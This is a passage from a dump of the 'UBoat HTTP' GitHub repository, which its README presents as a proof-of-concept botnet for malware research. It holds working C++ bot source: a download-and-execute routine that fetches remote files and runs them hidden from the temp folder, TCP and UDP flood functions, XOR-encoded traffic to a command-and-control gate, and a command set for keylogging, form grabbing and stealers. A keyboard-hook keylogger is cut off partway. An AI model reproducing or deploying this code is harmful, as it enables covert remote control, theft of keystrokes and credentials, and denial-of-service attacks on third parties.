├── .gitmodules ├── LICENSE ├── README.md └── boat ├── AggressiveOptimize.h ├── Command.cpp ├── Commands.h ├── DownloadExecute.cpp ├── DownloadExecute.h ├── Flood.cpp ├── Flood.h ├── Gate.h ├── GateHelper.cpp ├── GateHelper.h ├── HttpQuery.cpp ├── HttpQuery.h ├── Keylogger.cpp ├── Keylogger.h ├── OSCpuChecker.cpp ├── OSCpuChecker.h ├── OSGetRam.cpp ├── OSGetRam.h ├── OSGpuChecker.cpp ├── OSGpuChecker.h ├── OSHwidChecker.cpp ├── OSHwidChecker.h ├── OSNetVersionChecker.cpp ├── OSNetVersionChecker.h ├── OSVersionChecker.cpp ├── OSVersionChecker.h ├── PEIsAdmin.cpp ├── PeIsAdmin.h ├── Processes.cpp ├── Processes.h ├── Screenshot.cpp ├── Screenshot.h ├── SocketInit.cpp ├── SocketInit.h ├── Sockets.cpp ├── Sockets.h ├── Startup.cpp ├── Startup.h ├── Stealers.h ├── StringOperations.cpp ├── StringOperations.h ├── URLEncoding.cpp ├── URLEncoding.h ├── WebSafeEncryption.cpp ├── WebSafeEncryption.h ├── WebsiteChecker.cpp ├── WebsiteChecker.h ├── boat.sln ├── boat.vcxproj ├── boat.vcxproj.filters ├── boat.vcxproj.user ├── main.cpp ├── xor.cpp └── xor.h /.gitmodules: -------------------------------------------------------------------------------- 1 | [submodule "Updated-UBoat-Panel"] 2 | path = Panel 3 | url = https://github.com/matricali/UBoat-Panel.git 4 | branch = master 5 | -------------------------------------------------------------------------------- /LICENSE: -------------------------------------------------------------------------------- 1 | MIT License 2 | 3 | Copyright (c) 2018 Souhardya Sardar 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 22 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # UBoat HTTP 2 | 3 | A proof-of-concept HTTP Botnet designed to replicate a full weaponized commercial botnet. 4 | 5 | ![](https://image.ibb.co/m5yi9T/spectral_login.png) 6 | ![license](https://img.shields.io/badge/license-MIT-brightgreen.svg) 7 | ![awesome](https://cdn.rawgit.com/sindresorhus/awesome/d7305f38d29fed78fa85652e3a63e154dd8e8829/media/badge.svg) 8 | ![version](https://img.shields.io/badge/version-0.1.0-lightgrey.svg) 9 | 10 | ## Disclaimer 11 | 12 | **This project should be used for authorized testing or educational purposes only.** 13 | 14 | **The main objective behind creating this offensive project was to aid security researchers and to enhance the understanding of commercial HTTP loader style botnets. 15 | We hope this project helps to contribute to the malware research community and people can develop efficient countermeasures.** 16 | 17 | **Usage of UBoat without prior mutual consistency can be considered as an illegal activity. It is the final user's responsibility to obey all applicable local, state and federal laws. Authors assume no liability and are not responsible for any misuse or damage caused by this program.** 18 | 19 | ## What is a Botnet ? 20 | 21 | https://securityaffairs.co/wordpress/13747/cyber-crime/http-botnets-the-dark-side-of-an-standard-protocol.html 22 | 23 | ## Features 24 | 25 | - Written in C++ with no dependencies. 26 | - Encrypted C&C communications. 27 | - Persistence to prevent your control from being lost. 28 | - Connection redundancy (Uses a fallback server address or domain). 29 | - DDoS methods (TCP & UDP Flood). 30 | - Task Creation System (Altering system HWID, Country, IP, OS.System). 31 | - Remote command execution. 32 | - Update and uninstall other malware. 33 | - Download and execute other malware. 34 | - Active as well as a passive key-logger. 35 | - Enable Windows RDP. 36 | - Plugin system for easy feature updates. 37 | 38 | ## Getting started ? 39 | 40 | - Download the bot from **https://github.com/Souhardya/UBoat/releases** 41 | - Follow the wiki at **https://github.com/Souhardya/UBoat/wiki** 42 | 43 | 44 | ## Contributors & Maintainers 45 | 46 | - Souhardya Sardar ( @malpwn ) 47 | - Tuhinshubhra aka r3dhax0r ( @r3dhax0r ) 48 | - Jorge Matricali ( https://github.com/matricali ) 49 | 50 | 51 | ## Screenshots 52 | 53 | ![](https://preview.ibb.co/j7frDo/Screenshot_7.png) 54 | 55 | ![](https://preview.ibb.co/cwyiR8/Screenshot_8.png) 56 | 57 | ## License 58 | 59 | UBoat is released under the MIT License. See [LICENSE](LICENSE) file for more details. 60 | -------------------------------------------------------------------------------- /boat/AggressiveOptimize.h: -------------------------------------------------------------------------------- 1 | ///////////////////////////// 2 | // Version 1.10 3 | // Jan 23rd, 2000 4 | // Version 1.00 5 | // May 20th, 1999 6 | // Todd C. Wilson, Fresh Ground Software 7 | // (todd@nopcode.com) 8 | // This header file will kick in settings for Visual C++ 5 and 6 that will (usually) 9 | // result in smaller exe's. 10 | // The "trick" is to tell the compiler to not pad out the function calls; this is done 11 | // by not using the /O1 or /O2 option - if you do, you implicitly use /Gy, which pads 12 | // out each and every function call. In one single 500k dll, I managed to cut out 120k 13 | // by this alone! 14 | // The other two "tricks" are telling the Linker to merge all data-type segments together 15 | // in the exe file. The relocation, read-only (constants) data, and code section (.text) 16 | // sections can almost always be merged. Each section merged can save 4k in exe space, 17 | // since each section is padded out to 4k chunks. This is very noticable with smaller 18 | // exes, since you could have only 700 bytes of data, 300 bytes of code, 94 bytes of 19 | // strings - padded out, this could be 12k of runtime, for 1094 bytes of stuff! 20 | // Note that if you're using MFC static or some other 3rd party libs, you may get poor 21 | // results with merging the readonly (.rdata) section - the exe may grow larger. 22 | // To use this feature, define _MERGE_DATA_ in your project or before this header is used. 23 | // With Visual C++ 5, the program uses a file alignement of 512 bytes, which results 24 | // in a small exe. Under VC6, the program instead uses 4k, which is the same as the 25 | // section size. The reason (from what I understand) is that 4k is the chunk size of 26 | // the virtual memory manager, and that WinAlign (an end-user tuning tool for Win98) 27 | // will re-align the programs on this boundary. The problem with this is that all of 28 | // Microsoft's system exes and dlls are not tuned like this, and using 4k causes serious 29 | // exe bloat. Very noticable for smaller programs. 30 | // The "trick" for this is to use the undocumented FILEALIGN linker parm to change the 31 | // padding from 4k to 1/2k, which results in a much smaller exe - anywhere from 20%-75% 32 | // depending on the size. 33 | 34 | 35 | #ifdef NDEBUG 36 | // /Og (global optimizations), /Os (favor small code), /Oy (no frame pointers) 37 | #pragma optimize("gsy",on) 38 | 39 | #pragma comment(linker,"/RELEASE") 40 | 41 | // Note that merging the .rdata section will result in LARGER exe's if you using 42 | // MFC (esp. static link). If this is desirable, define _MERGE_RDATA_ in your project. 43 | #ifdef _MERGE_RDATA_ 44 | #pragma comment(linker,"/merge:.rdata=.data") 45 | #endif // _MERGE_RDATA_ 46 | 47 | #pragma comment(linker,"/merge:.text=.data") 48 | #pragma comment(linker,"/merge:.reloc=.data") 49 | 50 | #if _MSC_VER >= 1000 51 | // Only supported/needed with VC6; VC5 already does 0x200 for release builds. 52 | // Totally undocumented! And if you set it lower than 512 bytes, the program crashes. 53 | // Either leave at 0x200 or 0x1000 54 | #pragma comment(linker,"/FILEALIGN:0x200") 55 | #endif // _MSC_VER >= 1000 56 | 57 | #endif // NDEBUG#pragma once 58 | -------------------------------------------------------------------------------- /boat/Command.cpp: -------------------------------------------------------------------------------- 1 | #include "Commands.h" 2 | #include "URLEncoding.h" 3 | #include "StringOperations.h" 4 | 5 | #include 6 | #include 7 | #include 8 | 9 | using namespace std; 10 | 11 | char* CreateCommand(int commandId, int commandType, char* data, int dataLength) 12 | { 13 | char* idString = (char*)malloc(11); 14 | ZeroMemory(idString, 11); 15 | _itoa_s(commandId, idString, 11, 10); 16 | char* typeString = (char*)malloc(11); 17 | ZeroMemory(typeString, 11); 18 | _itoa_s(commandType, typeString, 11, 10); 19 | 20 | char* encoded = URLEncode(data, dataLength); 21 | 22 | char** strings = new char*[5] { idString, "|", typeString, "|", encoded}; 23 | 24 | int outputLen; 25 | char* returnBuffer = JoinString(strings, 5, &outputLen); 26 | return returnBuffer; 27 | } 28 | 29 | void FreeCommand(char* data) 30 | { 31 | FreeJoinStringBuffer(data); 32 | } 33 | 34 | int ParseCommand(char* command, char** commandData, int* commandType) 35 | { 36 | int numResults; 37 | char** splitResult = SplitString(command, "|", &numResults, false); 38 | 39 | if (numResults != 3) return -1; 40 | 41 | 42 | int commandId = std::stoi(splitResult[0], 0, 10); 43 | *commandType = std::stoi(splitResult[1], 0, 10); 44 | 45 | int commandSize; 46 | char* decoded = URLDecode(splitResult[2], &commandSize); 47 | 48 | FreeSplitStringBuffer(splitResult, numResults); 49 | 50 | char* commandString = (char*)malloc(commandSize + 1); 51 | commandString[commandSize] = 0; 52 | memcpy_s(commandString, commandSize, decoded, commandSize); 53 | 54 | FreeURLDecodeResult(decoded); 55 | 56 | *commandData = commandString; 57 | return commandId; 58 | } 59 | 60 | void FreeParsedCommandResult(char* data) 61 | { 62 | free(data); 63 | } 64 | -------------------------------------------------------------------------------- /boat/Commands.h: -------------------------------------------------------------------------------- 1 | #ifndef COMMANDS_H 2 | #define COMMANDS_H 3 | 4 | #define COMMAND_JOIN 0 5 | #define COMMAND_POLL 1 6 | #define COMMAND_CHECKIFSITEISUP 2 7 | #define COMMAND_SHUTDOWN 3 8 | #define COMMAND_RESTART 4 9 | #define COMMAND_MESSAGEBOX 5 10 | #define COMMAND_KEYLOG 6 11 | #define COMMAND_REMOTEPROCESS 7 12 | #define COMMAND_DOWNLOADEXECUTE 8 13 | #define COMMAND_REMOTEPROCESSNORESULT 9 14 | #define COMMAND_TCPFLOOD 10 15 | #define COMMAND_UPDATE 11 16 | #define COMMAND_SCREENSHOT 12 17 | #define COMMAND_UDPFLOOD 13 18 | #define COMMAND_FORMGRAB 14 19 | #define COMMAND_STEALERS 15 20 | 21 | typedef void(*CommandParserDelegate) (int, int, char*); 22 | typedef void(*PostPollDelegate) (); 23 | 24 | char* CreateCommand(int commandId, int commandType, char* data, int dataLength); 25 | void FreeCommand(char* data); 26 | 27 | int ParseCommand(char* command, char** commandData, int* commandType); 28 | void FreeParsedCommandResult(char* data); 29 | 30 | #endif -------------------------------------------------------------------------------- /boat/DownloadExecute.cpp: -------------------------------------------------------------------------------- 1 | #include "DownloadExecute.h" 2 | #include "HttpQuery.h" 3 | #include "WebSiteChecker.h" 4 | #include 5 | #include "StringOperations.h" 6 | #include 7 | 8 | // This is similar in betabot :P 9 | 10 | void gen_random(char *s, const int len); 11 | 12 | bool DownloadExecuteFile(char* filePath) { 13 | char* host; 14 | char* path; 15 | if (!URLToHostPath(filePath, &host, &path)) return false; 16 | char* data; 17 | NameValuePair** headers; 18 | int length; 19 | int result = HTTPQuery(host, path, NULL, &headers, &data, &length); 20 | 21 | if (result != 200 || length <= 0) { 22 | FreeHTTPResponse(headers, data); 23 | return false; 24 | } 25 | 26 | char* tempDir = (char*)malloc(260); 27 | GetTempPathA(260, tempDir); 28 | char* randomName = (char*)malloc(11); 29 | gen_random(randomName, 10); 30 | 31 | char** join = (char**)malloc(sizeof(char*) * 4); 32 | join[0] = tempDir; 33 | join[1] = randomName; 34 | 35 | int splitLength; 36 | char** splitResults = SplitString(filePath, ".", &splitLength, true); 37 | if (splitLength == 0) return false; 38 | join[2] = "."; 39 | join[3] = splitResults[splitLength - 1]; 40 | 41 | char* output; 42 | int stringLength; 43 | output = JoinString(join, 4, &stringLength); 44 | 45 | FreeSplitStringBuffer(splitResults, splitLength); 46 | free(join); 47 | free(randomName); 48 | free(tempDir); 49 | 50 | 51 | HANDLE file = CreateFileA(output, GENERIC_READ | GENERIC_WRITE, 0, NULL, CREATE_ALWAYS, 0x2, NULL); 52 | if (file == 0) { 53 | FreeHTTPResponse(headers, data); 54 | FreeJoinStringBuffer(output); 55 | return false; 56 | } 57 | 58 | if (!WriteFile(file, data, length, NULL, NULL)) { 59 | FreeHTTPResponse(headers, data); 60 | FreeJoinStringBuffer(output); 61 | return false; 62 | } 63 | 64 | CloseHandle(file); 65 | FreeHTTPResponse(headers, data); 66 | 67 | STARTUPINFOA si; 68 | PROCESS_INFORMATION pi; 69 | 70 | ZeroMemory(&si, sizeof(si)); 71 | ZeroMemory(&pi, sizeof(pi)); 72 | 73 | si.cb = sizeof(STARTUPINFOA); 74 | 75 | join = (char**)malloc(sizeof(char**) * 3); 76 | join[0] = " \""; 77 | join[1] = output; 78 | join[2] = "\""; 79 | 80 | char* params = JoinString(join, 3, &stringLength); 81 | FreeJoinStringBuffer(output); 82 | 83 | char explorerPath[260]; 84 | GetSystemDirectoryA(explorerPath, 260); 85 | strcat_s(explorerPath, 260, "\\explorer.exe"); 86 | 87 | if (CreateProcessA(explorerPath, params, NULL, NULL, FALSE, DETACHED_PROCESS, NULL, NULL, &si, &pi)) { 88 | FreeJoinStringBuffer(params); 89 | return true; 90 | } 91 | else { 92 | FreeJoinStringBuffer(params); 93 | DWORD err = GetLastError(); 94 | return false; 95 | } 96 | } 97 | 98 | void gen_random(char *s, const int len) { 99 | srand(time(NULL)); 100 | static const char alphanum[] = 101 | "0123456789" 102 | "ABCDEFGHIJKLMNOPQRSTUVWXYZ" 103 | "abcdefghijklmnopqrstuvwxyz"; 104 | 105 | for (int i = 0; i < len; ++i) { 106 | s[i] = alphanum[rand() % (sizeof(alphanum) - 1)]; 107 | } 108 | 109 | s[len] = 0; 110 | } 111 | -------------------------------------------------------------------------------- /boat/DownloadExecute.h: -------------------------------------------------------------------------------- 1 | #ifndef DOWNLOADEXECUTE_H 2 | #define DOWNLOADEXECUTE_H 3 | 4 | bool DownloadExecuteFile(char* filePath); 5 | 6 | #endif -------------------------------------------------------------------------------- /boat/Flood.cpp: -------------------------------------------------------------------------------- 1 | #include "Flood.h" 2 | #include "Sockets.h" 3 | 4 | void TCPFlood(char* destination, unsigned short port, int seconds, int timespersecond) { 5 | sockaddr_in input; 6 | if (!GetSocketAddress(destination, &input)) return; 7 | input.sin_port = htons(port); 8 | SOCKET s; 9 | 10 | char data[65536]; 11 | memset(data, 0xCC, 65536); 12 | 13 | for (int i = 0; i < seconds * timespersecond; i++) { 14 | Sleep(1000 / timespersecond); 15 | s = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP); 16 | if (s == 0) continue; 17 | 18 | int cRes = connect(s, (sockaddr*)&input, sizeof(input)); 19 | if (cRes == SOCKET_ERROR) { 20 | closesocket(s); continue; 21 | } 22 | send(s, data, 65536, 0); 23 | Sleep(10); 24 | send(s, data, 65536, 0); 25 | 26 | closesocket(s); 27 | } 28 | } 29 | 30 | void UDPFlood(char* destination, unsigned short port, int seconds, int timespersecond) { 31 | sockaddr_in input; 32 | if (!GetSocketAddress(destination, &input)) return; 33 | input.sin_port = htons(port); 34 | SOCKET c; 35 | 36 | char dat[65536]; 37 | memset(dat, 0xCC, 65536); 38 | 39 | for (int i = 0; i < seconds * timespersecond; i++) { 40 | Sleep(1000 / timespersecond); 41 | c = socket(AF_INET, SOCK_STREAM, IPPORT_BIFFUDP); 42 | if (c == 0) continue; 43 | int cRes = connect(c, (sockaddr*)&input, sizeof(input)); 44 | if (cRes == SOCKET_ERROR) { 45 | closesocket(c); continue; 46 | } 47 | send(c, dat, 65536, 0); 48 | Sleep(10); 49 | send(c, dat, 65536, 0); 50 | 51 | closesocket(c); 52 | } 53 | } -------------------------------------------------------------------------------- /boat/Flood.h: -------------------------------------------------------------------------------- 1 | #ifndef FLOOD_H 2 | #define FLOOD_H 3 | 4 | void TCPFlood(char* destination, unsigned short port, int seconds, int timespersecond = 1); 5 | 6 | #endif -------------------------------------------------------------------------------- /boat/Gate.h: -------------------------------------------------------------------------------- 1 | #ifndef GATE_H 2 | #define GATE_H 3 | //Gate 1 4 | static const char* GATE_HOST = "abc.com"; 5 | static const char* GATE_PATH = "/css_r/gate.php"; 6 | //Gate 2 7 | static const char* FALLBACK_GATE_HOST = "localhost"; // here is your game 8 | static const char* FALLBACK_GATE_PATH = "/UBoat/gate.php"; 9 | 10 | static const int POLL_RATE = (1000 * 63 * 1); 11 | 12 | #endif 13 | -------------------------------------------------------------------------------- /boat/GateHelper.cpp: -------------------------------------------------------------------------------- 1 | #include "Gate.h" 2 | #include "HttpQuery.h" 3 | #include "GateHelper.h" 4 | #include "WebSafeEncryption.h" 5 | #include 6 | 7 | char* botId = "-1"; 8 | 9 | void SetBotId(char* newId) { 10 | botId = (char*)malloc(strlen(newId) + 1); 11 | botId[strlen(newId)] = 0; 12 | memcpy_s(botId, strlen(newId), newId, strlen(newId)); 13 | } 14 | 15 | char* GetBotId() { 16 | return botId; 17 | } 18 | 19 | char* SendCommandWithDecodedResponse(char* command) { 20 | char* key = GenerateKey(32); 21 | char* encodedKey; 22 | 23 | char* encodedResult = GetEncodedXorResult(command, key, strlen(command), 32, &encodedKey); 24 | FreeKey(key); 25 | 26 | 27 | NameValuePair* headers[] = { 28 | new NameValuePair("X-Token", encodedKey), 29 | new NameValuePair("X-Id", botId), 30 | 0 31 | }; 32 | 33 | NameValuePair* postData[] = { 34 | new NameValuePair("x", encodedResult), 35 | 0 36 | }; 37 | 38 | NameValuePair** returnedHeaders; 39 | char* returnedData; 40 | int dataLength; 41 | 42 | int result = HTTPQuery((char*)GATE_HOST, (char*)GATE_PATH, headers, &returnedHeaders, &returnedData, &dataLength, true, "POST", postData); 43 | FreeEncodedXorResult(encodedResult, encodedKey); 44 | 45 | char* newKey = 0; 46 | 47 | NameValuePair** headerPointer = returnedHeaders; 48 | 49 | while (headerPointer != 0 && *headerPointer != 0) 50 | { 51 | if (strcmp((*headerPointer)->Name, "X-Token") == 0) 52 | { 53 | newKey = (char*)(*headerPointer)->Value; 54 | break; 55 | } 56 | 57 | headerPointer++; 58 | } 59 | 60 | 61 | int outputLength; 62 | char* output = GetDecodedXorResult(returnedData, newKey, &outputLength); 63 | 64 | char* returnBuffer = (char*)malloc(outputLength + 1); 65 | returnBuffer[outputLength] = 0; 66 | memcpy_s(returnBuffer, outputLength, output, outputLength); 67 | 68 | FreeDecodedXorResult(output); 69 | 70 | 71 | int i = 0; 72 | while (headers[i] != 0) 73 | { 74 | delete (headers[i]); 75 | i++; 76 | } 77 | 78 | i = 0; 79 | while (postData[i] != 0) 80 | { 81 | delete (postData[i]); 82 | i++; 83 | } 84 | 85 | FreeHTTPResponse(returnedHeaders, returnedData); 86 | 87 | return returnBuffer; 88 | } 89 | 90 | void FreeDecodedResponse(char* response) { 91 | free(response); 92 | } -------------------------------------------------------------------------------- /boat/GateHelper.h: -------------------------------------------------------------------------------- 1 | #ifndef GATEHELPER_H 2 | #define GATEHELPER_H 3 | 4 | void SetBotId(char* newId); 5 | char* GetBotId(); 6 | char* SendCommandWithDecodedResponse(char* command); 7 | void FreeDecodedResponse(char* response); 8 | 9 | #endif -------------------------------------------------------------------------------- /boat/HttpQuery.cpp: -------------------------------------------------------------------------------- 1 | #include "HttpQuery.h" 2 | #include "StringOperations.h" 3 | #include 4 | #include 5 | #include 6 | #include "Sockets.h" 7 | 8 | #define POST_BUFFER_LEN (1024 * 1024 * (7)) //5MB buffer you made it 15MB? you did that oh lol 40 for now. 9 | 10 | char to_hex(char code) { 11 | static char hex[] = "0123456789abcdef"; 12 | return hex[code & 15]; 13 | } 14 | 15 | char *url_encode(const char *str) { 16 | char *pstr = (char*)str, *buf = (char*)malloc(strlen(str) * 3 + 1), *pbuf = buf; 17 | while (*pstr) { 18 | if (isalnum(*pstr) || *pstr == '-' || *pstr == '_' || *pstr == '.' || *pstr == '~') 19 | *pbuf++ = *pstr; 20 | else if (*pstr == ' ') 21 | *pbuf++ = '+'; 22 | else 23 | *pbuf++ = '%', *pbuf++ = to_hex(*pstr >> 4), *pbuf++ = to_hex(*pstr & 15); 24 | pstr++; 25 | } 26 | *pbuf = '\0'; 27 | return buf; 28 | } 29 | 30 | static char* response_code_name = "HTTP Response Code"; 31 | 32 | int HTTPQuery(char* host, char* path, NameValuePair** headers, NameValuePair*** responseHeaders, char** responseData, int* dataLength, bool isString, char* protocol, NameValuePair** postData) 33 | { 34 | *responseData = 0; 35 | *responseHeaders = 0; 36 | 37 | sockaddr_in input; 38 | if(!GetSocketAddress(host, &input)) return -1; 39 | SOCKET s = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP); 40 | if (s == INVALID_SOCKET) return -1; 41 | 42 | int cRes = connect(s, (sockaddr*)&input, sizeof(input)); 43 | if (cRes == SOCKET_ERROR) return -1; 44 | 45 | char* sendBuffer = (char*)malloc(512); 46 | 47 | char* postBuffer = (char*)GlobalAlloc(GMEM_FIXED, POST_BUFFER_LEN); 48 | ZeroMemory(postBuffer, POST_BUFFER_LEN); 49 | 50 | 51 | sprintf_s(sendBuffer, 512, "%s %s HTTP/1.0\r\nHost: %s\r\n", protocol, path, host); 52 | 53 | send(s, sendBuffer, strlen(sendBuffer), 0); 54 | 55 | if (headers != NULL) 56 | { 57 | int i = 0; 58 | while (headers[i] != NULL) 59 | { 60 | sprintf_s(sendBuffer, 512, "%s: %s\r\n", headers[i]->Name, headers[i]->Value); 61 | send(s, sendBuffer, strlen(sendBuffer), 0); 62 | i++; 63 | } 64 | } 65 | 66 | if (postData != NULL) 67 | { 68 | char* contentType = "Content-Type: application/x-www-form-urlencoded\r\n"; 69 | send(s, contentType, strlen(contentType), 0); 70 | int i = 0; 71 | bool posted = false; 72 | while (postData[i] != NULL) 73 | { 74 | char* encoded = url_encode(postData[i]->Value); 75 | int len = strlen(encoded); 76 | sprintf_s(postBuffer + strlen(postBuffer), POST_BUFFER_LEN - strlen(postBuffer), "%s%s=%s", posted ? "&" : "", postData[i]->Name, encoded); 77 | free(encoded); 78 | i++; 79 | posted = true; 80 | } 81 | sprintf_s(sendBuffer, 512, "Content-Length: %d\r\n", strlen(postBuffer)); 82 | send(s, sendBuffer, strlen(sendBuffer), 0); 83 | } 84 | 85 | send(s, "\r\n", 2, 0); 86 | 87 | if (strlen(postBuffer) != 0) 88 | { 89 | send(s, postBuffer, strlen(postBuffer), 0); 90 | } 91 | 92 | GlobalFree((HGLOBAL)postBuffer); 93 | free(sendBuffer); 94 | 95 | char* recvBuffer = (char*)malloc(2048); 96 | char* originalBuffer = recvBuffer; 97 | 98 | do 99 | { 100 | int r = recv(s, recvBuffer++, 1, 0); 101 | if (r == 0) 102 | { 103 | free(recvBuffer); 104 | return -1; 105 | } 106 | } while ((recvBuffer - originalBuffer < 4) || *(recvBuffer - 1) != '\n' || *(recvBuffer - 2) != '\r' || *(recvBuffer - 3) != '\n' || *(recvBuffer - 4) != '\r'); 107 | 108 | int r = recvBuffer - originalBuffer; 109 | 110 | char* headerBuffer = (char*)malloc(r - 4 + 1); 111 | headerBuffer[r - 4] = 0; 112 | memcpy_s(headerBuffer, r - 4, originalBuffer, r - 4); 113 | free(originalBuffer); 114 | 115 | int httpResponseValue = 0; 116 | int headerCount; 117 | char** splitResults = SplitString(headerBuffer, "\r\n", &headerCount, true); 118 | NameValuePair** returnHeaders = (NameValuePair**)malloc(sizeof(NameValuePair*) * (headerCount + 1)); 119 | 120 | for (int i = 0; i < headerCount; i++) 121 | { 122 | int num; 123 | char** splitResult2 = SplitString(splitResults[i], ": ", &num, false); 124 | 125 | if (num == 2) 126 | { 127 | int nameLength = strlen(splitResult2[0]); 128 | int valueLength = strlen(splitResult2[1]); 129 | char* name = (char*)malloc(nameLength + 1); 130 | name[nameLength] = 0; 131 | char* value = (char*)malloc(valueLength + 1); 132 | value[valueLength] = 0; 133 | 134 | memcpy_s(name, nameLength, splitResult2[0], nameLength); 135 | memcpy_s(value, valueLength, splitResult2[1], valueLength); 136 | 137 | returnHeaders[i] = new NameValuePair(name, value); 138 | } 139 | else if (num == 1) 140 | { 141 | int valueLength = strlen(splitResult2[0]); 142 | char* value = (char*)malloc(valueLength + 1); 143 | value[valueLength] = 0; 144 | memcpy_s(value, valueLength, splitResult2[0], valueLength); 145 | 146 | returnHeaders[i] = new NameValuePair(i == 0 ? response_code_name : 0, value); 147 | 148 | int numResultCode; 149 | char** splitResult3 = SplitString(value, " ", &numResultCode, false); 150 | 151 | if (numResultCode == 3) 152 | { 153 | DWORD* http = (DWORD*)"HTTP"; 154 | if(*(DWORD*)splitResult3[0] == *http) 155 | httpResponseValue = std::stoi(splitResult3[1]); 156 | } 157 | 158 | FreeSplitStringBuffer(splitResult3, numResultCode); 159 | } 160 | 161 | FreeSplitStringBuffer(splitResult2, num); 162 | } 163 | 164 | returnHeaders[headerCount] = 0; 165 | *responseHeaders = returnHeaders; 166 | free(headerBuffer); 167 | 168 | FreeSplitStringBuffer(splitResults, headerCount); 169 | 170 | int contentLength = 0; 171 | 172 | for (int i = 0; i < headerCount; i++) 173 | { 174 | if (returnHeaders[i]->Name != 0 && strcmp(returnHeaders[i]->Name, "Content-Length") == 0) 175 | contentLength = std::stoi(returnHeaders[i]->Value); 176 | } 177 | 178 | if (contentLength == 0) contentLength = 1024 * 1024 * 2; //2MB buffer. 179 | 180 | recvBuffer = (char*)malloc(contentLength + (isString ? 1: 0)); 181 | originalBuffer = recvBuffer; 182 | if(isString) originalBuffer[contentLength] = 0; 183 | 184 | int readLength = 0; 185 | 186 | while (readLength != contentLength) 187 | { 188 | int read = recv(s, recvBuffer, contentLength - readLength, 0); 189 | 190 | if (read > 0) 191 | { 192 | readLength += read; 193 | recvBuffer += read; 194 | } 195 | else if (read == 0 && readLength != contentLength) 196 | { 197 | char* newBuffer = (char*)malloc(readLength + 1); 198 | newBuffer[readLength] = 0; 199 | memcpy_s(newBuffer, readLength, originalBuffer, readLength); 200 | free(originalBuffer); 201 | originalBuffer = newBuffer; 202 | break; 203 | } 204 | else 205 | { 206 | int error = WSAGetLastError(); 207 | int b = 0; 208 | } 209 | } 210 | 211 | *dataLength = readLength; 212 | *responseData = originalBuffer; 213 | 214 | return httpResponseValue; 215 | } 216 | 217 | void FreeHTTPResponse(NameValuePair** header, char* data) 218 | { 219 | if(data) free(data); 220 | NameValuePair** headerOrig = header; 221 | while (header && *header) 222 | { 223 | if((*header)->Name && (*header)->Name != response_code_name) free((void*)(*header)->Name); 224 | free((void*)(*header)->Value); 225 | free(*header); 226 | header++; 227 | } 228 | free(headerOrig); 229 | } -------------------------------------------------------------------------------- /boat/HttpQuery.h: -------------------------------------------------------------------------------- 1 | #ifndef HTTPQUERY_H 2 | #define HTTPQUERY_H 3 | 4 | #include "Sockets.h" 5 | 6 | typedef struct NameValuePair 7 | { 8 | const char* Name; 9 | const char* Value; 10 | NameValuePair(char* name, char* value) { 11 | Name = name; 12 | Value = value; 13 | } 14 | } NameValuePair; 15 | 16 | char to_hex(char code); 17 | char* url_encode(char *str); 18 | int HTTPQuery(char* host, char* path, NameValuePair** headers, NameValuePair*** responseHeaders, char** responseData, int* dataLength, bool isString = true, char* protocol = "GET", NameValuePair** postData = 0); 19 | void FreeHTTPResponse(NameValuePair** header, char* data); 20 | bool GetSocket(char* host, sockaddr_in* address); 21 | 22 | #endif -------------------------------------------------------------------------------- /boat/Keylogger.cpp: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | 5 | std::mutex m; 6 | 7 | char* KeylogBuffer = 0; 8 | int i = 0; 9 | bool isLogging = false; 10 | HHOOK hKeyHook; 11 | 12 | #define KEYLOG_BUFFER_SIZE (1024 * 1024 * 1) 13 | 14 | bool IsKeylogging() { 15 | return isLogging; 16 | } 17 | 18 | char* FlushKeylogBuffer(int* length) { 19 | *length = 0; 20 | if (i == 0 || KeylogBuffer == 0) return NULL; 21 | std::lock_guard guard(m); 22 | char* newBuffer = (char*)malloc(i + 1); 23 | newBuffer[i] = 0; 24 | memcpy_s(newBuffer, i, KeylogBuffer, i); 25 | *length = i; 26 | i = 0; 27 | if (!isLogging) { 28 | free(KeylogBuffer); 29 | KeylogBuffer = 0; 30 | } 31 | 32 | return newBuffer; 33 | } 34 | 35 | void FreeFlushKeylogBufferResult(char* data) { 36 | if (data) free(data); 37 | } 38 | 39 | void WriteLog(char* key, int length) { 40 | std::lock_guard guard(m); 41 | if (i + length > KEYLOG_BUFFER_SIZE) return; 42 | 43 | if (length > 0) { 44 | memcpy_s(KeylogBuffer + i, KEYLOG_BUFFER_SIZE - i, key, length); 45 | } 46 | 47 | i += length; 48 | } 49 | 50 | char easytolower(char in) { 51 | if (in <= 'Z' && in >= 'A') 52 | return in - ('Z' - 'z'); 53 | return in; 54 | } 55 | 56 | bool shiftModifier = false; 57 | 58 | __declspec(dllexport) LRESULT CALLBACK KeyEvent(int nCode, WPARAM wParam, LPARAM lParam) 59 | { 60 | char szKey[256]; DWORD dwMsg; int i; 61 | 62 | if ((nCode == HC_ACTION) && 63 | ((wParam == WM_SYSKEYDOWN) || 64 | (wParam == WM_KEYDOWN))) 65 | { 66 | KBDLLHOOKSTRUCT kbHook; 67 | kbHook = *((KBDLLHOOKSTRUCT *)lParam); 68 | 69 | dwMsg = 1; 70 | dwMsg += kbHook.scanCode << 16; 71 | dwMsg += kbHook.flags << 24; 72 | 73 | i = GetKeyNameTextA(dwMsg, szKey, sizeof(szKey)); 74 | #ifdef _DEBUG_ 75 | printf("%s - VK: %d , SC: %d (length: %d)\n", szKey, kbHook.vkCode, kbHook.scanCode, i); 76 | #endif 